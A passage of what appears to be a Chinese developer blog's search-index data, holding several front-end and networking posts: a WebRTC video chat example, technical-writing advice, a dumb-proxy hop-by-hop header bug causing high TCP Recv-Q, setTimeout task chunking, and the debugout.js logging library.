在要求sesssion协商时发生 pc.onnegotiationneeded = function() { // 创建本地sdp描述 SDP (Session Description Protocol) session描述协议 pc.createOffer().then(localDescCreated).catch(onError); }; } // 当远程数据流到达时,将数据流装载到video中 pc.onaddstream = function(event){ remoteVideo.srcObject = event.stream; }; // 获取本地媒体流 navigator.mediaDevices.getUserMedia({ audio: true, video: true, }).then( function(stream) { // 将本地捕获的视频流装载到本地video中 localVideo.srcObject = stream; // 将本地流加入RTCPeerConnection 实例中 发送到其他端 pc.addStream(stream); }, onError); // 从Scaledrone监听信令数据 room.on(\u0026#39;data\u0026#39;, function(message, client){ // 消息是我自己发送的,则不处理 if (client.id === drone.clientId) { return; } if (message.sdp) { // 设置远程sdp, 在offer 或者 answer后 pc.setRemoteDescription(new RTCSessionDescription(message.sdp), function(){ // 当收到offer 后就接听 if (pc.remoteDescription.type === \u0026#39;offer\u0026#39;) { pc.createAnswer().then(localDescCreated).catch(onError); } }, onError); } else if (message.candidate) { // 增加新的 ICE canidatet 到本地的链接中 pc.addIceCandidate( new RTCIceCandidate(message.candidate), onSuccess, onError ); } }); } function localDescCreated(desc) { pc.setLocalDescription(desc, function(){ sendMessage({ \u0026#39;sdp\u0026#39;: pc.localDescription }); },onError); } 5. WebRTC简介 5.1. 介绍 WebRTC 是一个开源项目,用于Web浏览器之间进行实时音频视频通讯,数据传递。 WebRTC有几个JavaScript APIS。 点击链接去查看demo。\ngetUserMedia(): 捕获音频视频 MediaRecorder: 记录音频视频 RTCPeerConnection: 在用户之间传递音频流和视频流 RTCDataChannel: 在用户之间传递文件流 5.2. 在哪里使用WebRTC? Chrome FireFox Opera Android iOS 5.3. 什么是信令 WebRTC使用RTCPeerConnection在浏览器之间传递流数据, 但是也需要一种机制去协调收发控制信息,这就是信令。信令的方法和协议并不是在WebRTC中明文规定的。 在codelad中用的是Node,也有许多其他的方法。\n5.4. 什么是STUN和TURN和ICE? 
STUN(Session Traversal Utilities for NAT,NAT会话穿越应用程序)是一种网络协议,它允许位于NAT(或多重NAT)后的客户端找出自己的公网地址,查出自己位于哪种类型的NAT之后以及NAT为某一个本地端口所绑定的Internet端端口。这些信息被用来在两个同时处于NAT路由器之后的主机之间创建UDP通信。该协议由RFC 5389定义。 wikipedia STUN\nTURN(全名Traversal Using Relay NAT, NAT中继穿透),是一种资料传输协议(data-transfer protocol)。允许在TCP或UDP的连线上跨越NAT或防火墙。 TURN是一个client-server协议。TURN的NAT穿透方法与STUN类似,都是通过取得应用层中的公有地址达到NAT穿透。但实现TURN client的终端必须在通讯开始前与TURN server进行交互,并要求TURN server产生\u0026quot;relay port\u0026quot;,也就是relayed-transport-address。这时TURN server会建立peer,即远端端点(remote endpoints),开始进行中继(relay)的动作,TURN client利用relay port将资料传送至peer,再由peer转传到另一方的TURN client。wikipedia TURN\nICE (Interactive Connectivity Establishment,互动式连接建立 ),一种综合性的NAT穿越的技术。 互动式连接建立是由IETF的MMUSIC工作组开发出来的一种framework,可整合各种NAT穿透技术,如STUN、TURN(Traversal Using Relay NAT,中继NAT实现的穿透)、RSIP(Realm Specific IP,特定域IP)等。该framework可以让SIP的客户端利用各种NAT穿透方式打穿远程的防火墙。[wikipedia ICE]\nWebRTC被设计用于点对点之间工作,因此用户可以通过最直接的途径连接。然而,WebRTC的构建是为了应付现实中的网络: 客户端应用程序需要穿越NAT网关和防火墙,并且对等网络需要在直接连接失败的情况下进行回调。 作为这个过程的一部分,WebRTC api使用STUN服务器来获取计算机的IP地址,并将服务器作为中继服务器运行,以防止对等通信失败。(现实世界中的WebRTC更详细地解释了这一点。)\n5.5. WebRTC是否安全? WebRTC组件是强制要求加密的,并且它的JavaScript APIS只能在安全的域下使用(HTTPS 或者 localhost)。信令机制并没有被WebRTC标准定义,所以是否使用安全的协议就取决于你自己了。\n6. WebRTC 参考资料 官网教程\nWebRTC 简单的视频聊天 repo\nWebRTC 教程\nMDN WebRTC API\n谷歌codelab WebRT教程\ngithub上WebRTC各种例子\nsegemntfault上关于WebRTC的教程\n","permalink":"https://wdd.js.org/posts/2018/02/webrtc-tutorial-simple-video-chat/","summary":"本例子是参考webrtc-tutorial-simple-video-chat做的。 这个教程应该主要是去宣传ScaleDrone的sdk, 他们的服务是收费的,但是免费的也可以用,就是有些次数限制。\n本栗子的地址 本栗子的pages地址\n因为使用的是ScaleDrone的js sdk, 后期很可能服务不稳定之类的\n1. 准备 使用最新版谷歌浏览器(62版) 视频聊天中 一个是windows, 一个是mac stun服务器使用谷歌的,trun使用ScaleDrone的sdk,这样我就不用管服务端了。 2. 先上效果图 3. 再上在线例子点击此处 4. 
源码分析 // 产生随机数 if (!location.hash) { location.hash = Math.floor(Math.random() * 0xFFFFFF).toString(16); } // 获取房间号 var roomHash = location.hash.substring(1); // 放置你自己的频道id, 这是我注册了ScaleDrone 官网后,创建的channel // 你也可以自己创建 var drone = new ScaleDrone(\u0026#39;87fYv4ncOoa0Cjne\u0026#39;); // 房间名必须以 \u0026#39;observable-\u0026#39;开头 var roomName = \u0026#39;observable-\u0026#39; + roomHash; var configuration = { iceServers: [{ urls: \u0026#39;stun:stun.l.google.com:19302\u0026#39; // 使用谷歌的stun服务 }] }; var room; var pc; function onSuccess() {} function onError(error) { console.","title":"120行代码实现 浏览器WebRTC视频聊天"},{"content":" 本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swgger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5. markdown 工具推荐 蚂蚁笔记 这是我正使用的。 全平台(mac windows ios)有客户端,和浏览器端 笔记可以直接公布为博客 支持独立域名 标签很好用 支持思维导图 支持历史记录 cmd-markdown 有道云笔记 6. 
文档之外 公司有个同事,我曾问他使用什么搜索一些技术文档,他说用百度。作为一个翻墙老司机,我惊诧的问他:你为什么不用谷歌去搜索。他说他不会翻墙。我只能呵呵一笑。\n自从有一次搜索:graph for x^8 + y^8,我就决定不再使用百度了。你可以看一下两者的返回结果有什么不同。\n总之:有些鸟儿是关不住的 他们的羽毛太鲜亮了。\n","permalink":"https://wdd.js.org/posts/2018/02/how-to-write-a-technical-document/","summary":"本文来自于公司内部的一个分享。 在文档方面,对内的一些接口文档主要是用swagger来写的。虽然可以在线测试,比较方便。但是也存在着一些更新不及时,swagger文档无法导出成文件的问题。 在对外提供的文档方面:我主要负责做一个浏览器端的一个js sdk。文档还算可以github地址,所以想把一些写文档的心得分享给大家。\n1. 衡量好文档的唯一标准是什么? Martin(Bob大叔)曾在《代码整洁之道》一书打趣地说:当你的代码在做 Code Review 时,审查者要是愤怒地吼道:\n“What the fuck is this shit?” “Dude, What the fuck!” 等言辞激烈的词语时,那说明你写的代码是 Bad Code,如果审查者只是漫不经心的吐出几个\n“What the fuck?”,\n那说明你写的是 Good Code。衡量代码质量的唯一标准就是每分钟骂出“WTF” 的频率。\n衡量文档的标准也是如此。\n2. 好文档的特点 简洁:一句话可以说完的事情,就不要分两句话来说。并不是文档越厚越好,太厚的文档大多没人看。 准确: 字段类型,默认值,备注,是否必填等属性说明。 逻辑性: 文档如何划分? 利于查看。 demo胜千言: 好的demo胜过各种字段说明,可以复制下来直接使用。 读者心: 从读者的角度考虑, 方法尽量简洁。可以传递一个参数搞定的事情,绝对不要让用户去传两个参数。 及时更新: 不更新的文档比bug更严重。 向后兼容: 不要随意废弃已有的接口或者某个字段,除非你考虑到这样做的后果。 建立文档词汇表:每个概念只有一个名字,不要随意起名字,名不正则言不顺。 格式统一:例如时间格式。我曾见过2017-09-12 09:32:23, 或2017.09.12 09:32:23或2017.09.12 09:32:23。变量名user_name, userName。 使用专业词语:不要过于口语化 3. 总结: 写出好文档要有以下四点 逻辑性:便于查找 专业性: 值得信赖,质量保证 责任心:及时更新,准确性,向后兼容 读者心:你了解的东西,别人可能并不清楚。从读者的角度去考虑,他们需要什么,而不是一味去强调你能提供什么。 4. 写文档的工具 markdown: 方便快捷,可以导出各种格式的文件 swagger: 功能强大,需要部署,不方便传递文件 5.","title":"如何写好技术文档?"},{"content":"1. 问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理在转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部是代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnection Keep-Alive Proxy-Authenticate Proxy-Authorization Trailer TE Transfer-Encoding Upgrade 3. 什么是哑代理?
很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时Web服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.headers } var proxy = request(option) req.pipe(proxy) proxy.pipe(res) 4. 解决方案 解决方案有两个, 我推荐使用第二个方案,具体方法参考Express 代理中间件的写法\n更改自己的原有代码 使用成熟的开源产品 5. 参考文献 What is the reason for a high Recv-Q of a TCP connection? TCP buffers keep filling up (Recv-Q full): named unresponsive linux探秘:netstat中Recv-Q 深究 深入剖析 Socket——TCP 通信中由于底层队列填满而造成的死锁问题 netstat Recv-Q和Send-Q 深入剖析 Socket——数据传输的底层实现 Use of Recv-Q and Send-Q 【美】David Gourley / Brian Totty HTTP权威指南 【日】上野宣 于均良 图解HTTP ","permalink":"https://wdd.js.org/posts/2018/02/tcp-high-recv-q-or-send-q-reasons/","summary":"1.
问题现象 使用netstat -ntp命令时发现,Recv-Q 1692012 异常偏高(正常情况下,该值应该是0),导致应用占用过多的内存。\ntcp 1692012 0 172.17.72.4:48444 10.254.149.149:58080 ESTABLISHED 27/node 问题原因:代理在转发时,没有删除逐跳首部\n2. 什么是Hop-by-hop 逐跳首部? http首部可以分为两种\n端到端首部 End-to-end: 端到端首部是代理在转发时必须携带的 逐跳首部 Hop-by-hop: 逐跳首部只对单次转发有效,代理在转发时,必须删除这些首部 逐跳首部有以下几个, 这些首部在代理进行转发前必须删除\nConnection Keep-Alive Proxy-Authenticate Proxy-Authorization Trailer TE Transfer-Encoding Upgrade 3. 什么是哑代理? 很多老的或简单的代理都是盲中继(blind relay),它们只是将字节从一个连接转发到另一个连接中去,不对Connection首部进行特殊的处理。\n(1)在图4-15a中 Web客户端向代理发送了一条报文,其中包含了Connection:Keep-Alive首部,如果可能的话请求建立一条keep-alive连接。客户端等待响应,以确定对方是否认可它对keep-alive信道的请求。\n(2) 哑代理收到了这条HTTP请求,但它并不理解 Connection首部(只是将其作为一个扩展首部对待)。代理不知道keep-alive是什么意思,因此只是沿着转发链路将报文一字不漏地发送给服务器(图4-15b)。但Connection首部是个逐跳首部,只适用于单条传输链路,不应该沿着传输链路向下传输。接下来,就要发生一些很糟糕的事情了。\n(3) 在图4-15b中,经过中继的HTTP请求抵达了Web服务器。当Web服务器收到经过代理转发的Connection: Keep-Alive首部时,会误以为代理(对服务器来说,这个代理看起来就和所有其他客户端一样)希望进行keep-alive对话!对Web服务器来说这没什么问题——它同意进行keep-alive对话,并在图4-15c中回送了一个Connection: Keep-Alive响应首部。所以,此时Web服务器认为它在与代理进行keep-alive对话,会遵循keep-alive的规则。但代理却对keep-alive一无所知。不妙。\n(4) 在图4-15d中,哑代理将Web服务器的响应报文回送给客户端,并将来自Web服务器的Connection: Keep-Alive首部一起传送过去。客户端看到这个首部,就会认为代理同意进行keep-alive对话。所以,此时客户端和服务器都认为它们在进行keep-alive对话,但与它们进行对话的代理却对keep-alive一无所知。\n(5) 由于代理对keep-alive一无所知,所以会将收到的所有数据都回送给客户端,然后等待源端服务器关闭连接。但源端服务器会认为代理已经显式地请求它将连接保持在打开状态了,所以不会去关闭连接。这样,代理就会挂在那里等待连接的关闭。\n(6) 客户端在图4-15d中收到了回送的响应报文时,会立即转向下一条请求,在keep-alive连接上向代理发送另一条请求(参见图4-15e)。而代理并不认为同一条连接上会有其他请求到来,请求被忽略,浏览器就在这里转圈,不会有任何进展了。\n(7) 这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 \u0026ndash;《HTTP权威指南》\n这是HTTP权威指南中,关于HTTP哑代理的描述。这里说了哑代理会造成的一个问题。\n这种错误的通信方式会使浏览器一直处于挂起状态,直到客户端或服务器将连接超时,并将其关闭为止。 实际上,我认为哑代理还是造成以下问题的原因\nTCP链接高Recv-Q tcp链接不断开,导致服务器内存过高,内存泄露 节点iowait高 在我们自己的代理的代码中,我发现,在代理进行转发时,只删除了headers.host, 并没有删除headers.Connection等逐跳首部的字段\ndelete req.headers.host var option = { url: url, headers: req.","title":"哑代理 - 
TCP链接高Recv-Q,内存泄露的罪魁祸首"},{"content":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 
分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 var everyTimeCreateLines = 80; // 当前行 var currentLine = 0; setTimeout(function renderTable(){ console.time(\u0026#39;wd\u0026#39;); for(var i=currentLine; i\u0026lt;currentLine+everyTimeCreateLines \u0026amp;\u0026amp; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); currentLine = i; if(currentLine \u0026lt; allLines){ setTimeout(renderTable,0); } },0); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 这次异步按批次创建,没有耗时的警告。因为控制了每次代码在50ms内运行。实际上每80行耗时约10ms左右。这就不会引起页面卡顿等问题。\n","permalink":"https://wdd.js.org/posts/2018/02/settimeout-to-splice-big-work/","summary":"对于执行时间过长的脚本,有的浏览器会弹出警告,说页面无响应。有的浏览器会直接终止脚本。总而言之,浏览器不希望某一个代码块长时间处于运行状态,因为js是单线程的。一个代码块长时间运行,将会导致其他任何任务都必须等待。从用户体验上来说,很有可能发生页面渲染卡顿或者点击事件无响应的状态。\n如果一段脚本的运行时间超过5秒,有些浏览器(比如Firefox和Opera)将弹出一个对话框警告用户该脚本“无法响应”。而其他浏览器,比如iPhone上的浏览器,将默认终止运行时间超过5秒钟的脚本。\u0026ndash;《JavaScript忍者秘籍》\nJavaScript忍者秘籍里有个很好的比喻:页面上发生的各种事情就好像一群人在讨论事情,如果有个人一直在说个不停,其他人肯定不乐意。我们希望有个裁判,定时的切换其他人来说话。\nJs利用定时器来分解任务,关键点有两个。\n按什么维度去分解任务\n任务的现场保存与现场恢复\n1. 例子 要求:动态创建一个表格,一共10000行,每行10个单元格\n1.1. 
一次性创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.getElementsByTagName(\u0026#39;tbody\u0026#39;)[0]; var allLines = 10000; // 每次渲染的行数 console.time(\u0026#39;wd\u0026#39;); for(var i=0; i\u0026lt;allLines; i++){ var tr = document.createElement(\u0026#39;tr\u0026#39;); for(var j=0; j\u0026lt;10; j++){ var td = document.createElement(\u0026#39;td\u0026#39;); td.appendChild(document.createTextNode(i+\u0026#39;,\u0026#39;+j)); tr.appendChild(td); } tbody.appendChild(tr); } console.timeEnd(\u0026#39;wd\u0026#39;); \u0026lt;/script\u0026gt; \u0026lt;/body\u0026gt; \u0026lt;/html\u0026gt; 总共耗时180ms, 浏览器已经给出警告![Violation] 'setTimeout' handler took 53ms。\n1.2. 分批次动态创建 \u0026lt;!DOCTYPE html\u0026gt; \u0026lt;html\u0026gt; \u0026lt;head\u0026gt; \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; \u0026lt;title\u0026gt;\u0026lt;/title\u0026gt; \u0026lt;/head\u0026gt; \u0026lt;body\u0026gt; \u0026lt;table\u0026gt; \u0026lt;tbody\u0026gt;\u0026lt;/tbody\u0026gt; \u0026lt;/table\u0026gt; \u0026lt;script type=\u0026#34;text/javascript\u0026#34;\u0026gt; var tbody = document.","title":"定时器学习:利用定时器分解耗时任务案例"},{"content":" 我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 
后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。\n","permalink":"https://wdd.js.org/posts/2018/02/js-functional-programming/","summary":"我父亲以前跟我说过,有些事物在你得到之前是无足轻重的,得到之后就不可或缺了。微波炉是这样,智能手机是这样,互联网也是这样——老人们在没有互联网的时候过得也很充实。对我来说,函数的柯里化(curry)也是这样。\n然后我继续看了这本书的中文版。有些醍醐灌顶的感觉。 随之在github搜了一下。 我想,即使付费,我也愿意看。\n中文版地址:https://www.gitbook.com/book/llh911001/mostly-adequate-guide-chinese/details github原文地址:https://github.com/MostlyAdequate/mostly-adequate-guide\n1. 后记 其实我是想学点函数柯里化的东西,然后用谷歌搜索了一下。第一个结果就是这本书。非常感谢谷歌搜索,如果我用百度,可能就没有缘分遇到这本书了。","title":"关于JavaScript函数式编程,我多么希望能早点看到这本书"},{"content":" 本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websocket推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发去分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部指定行数的日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 
可选配置 ··· // log in real time (forwards to console.log) self.realTimeLoggingOn = true; // insert a timestamp in front of each log self.useTimestamps = false; // store the output using window.localStorage() and continuously add to the same log each session self.useLocalStorage = false; // set to false after you\u0026rsquo;re done debugging to avoid the log eating up memory self.recordLogs = true; // to avoid the log eating up potentially endless memory self.autoTrim = true; // if autoTrim is true, this many most recent lines are saved self.maxLines = 2500; // how many lines tail() will retrieve self.tailNumLines = 100; // filename of log downloaded with downloadLog() self.logFilename = \u0026rsquo;log.txt\u0026rsquo;; // max recursion depth for logged objects self.maxDepth = 25; ···\n5. 项目地址 https://github.com/inorganik/debugout.js\n6. 另外 我自己也模仿debugout.js写了一个日志保存的项目,该项目可以在ie10及以上下载日志。 debugout.js在ie浏览器上下载日志的方式是有问题的。 项目地址:https://github.com/wangduanduan/log4b.git\n","permalink":"https://wdd.js.org/posts/2018/02/save-console-log-as-file/","summary":"本篇文章来自一个需求,前端websocket会收到各种消息,但是调试的时候,我希望把websocket推送过来的消息都保存到一个文件里,如果出问题的时候,我可以把这些消息的日志文件提交给后端开发去分析错误。但是在浏览器里,js一般是不能写文件的。鼠标另存为的方法也是不太好,因为会保存所有的console.log的输出。于是,终于找到这个debugout.js。\ndebugout.js的原理是将所有日志序列化后,保存到一个变量里。当然这个变量不会无限大,因为默认的最大日志限制是2500行,这个是可配置的。另外,debugout.js也支持在localStorage里存储日志的。\n1. debugout.js 一般来说,可以使用打开console面板,然后右键save,是可以将console.log输出的信息另存为log文件的。但是这就把所有的日志都包含进来了,如何只保存我想要的日志呢?\n(调试输出)从您的日志中生成可以搜索,时间戳,下载等的文本文件。 参见下面的一些例子。\nDebugout的log()接受任何类型的对象,包括函数。 Debugout不是一个猴子补丁,而是一个单独的记录类,你使用而不是控制台。\n调试的一些亮点:\n在运行时或任何时间获取整个日志或尾部 搜索并切片日志 更好地了解可选时间戳的使用模式 在一个地方切换实时日志记录(console.log) 可选地将输出存储在window.localStorage中,并在每个会话中持续添加到同一个日志 可选地,将日志上限为X个最新行以限制内存消耗 下图是使用downloadLog方法下载的日志文件。\n官方提供的demo示例,欢迎试玩。http://inorganik.github.io/debugout.js/\n2. 
使用 在脚本顶部的全局命名空间中创建一个新的调试对象,并使用debugout的日志方法替换所有控制台日志方法:\nvar bugout = new debugout(); // instead of console.log(\u0026#39;some object or string\u0026#39;) bugout.log(\u0026#39;some object or string\u0026#39;); 3. API log() -像console.log(), 但是会自动存储 getLog() - 返回所有日志 tail(numLines) - 返回尾部指定行数的日志,默认100行 search(string) - 搜索日志 getSlice(start, numLines) - 日志切割 downloadLog() - 下载日志 clear() - 清空日志 determineType() - 一个更细粒度的typeof为您提供方便 4. 可选配置 ··· // log in real time (forwards to console.","title":"终于找到你!如何将前端console.log的日志保存成文件?"},{"content":"之前一直非常痛苦,在iframe外层根本获取不了里面的信息,后来使用了postMessage来传递消息实现,但是用起来还是非常不方便。\n其实浏览器本身是可以选择不同的iframe的执行环境的。例如有个变量是在iframe里面定义的,你只需要切换到这个iframe的执行环境,你就可以随意操作这个环境的任何变量了。\n这个小技巧,对于调试非常有用,但是我直到今天才发现。\n1. Chrome 这个小箭头可以让你选择不同的iframe的执行环境,可以切换到你的iframe环境里。\n2. 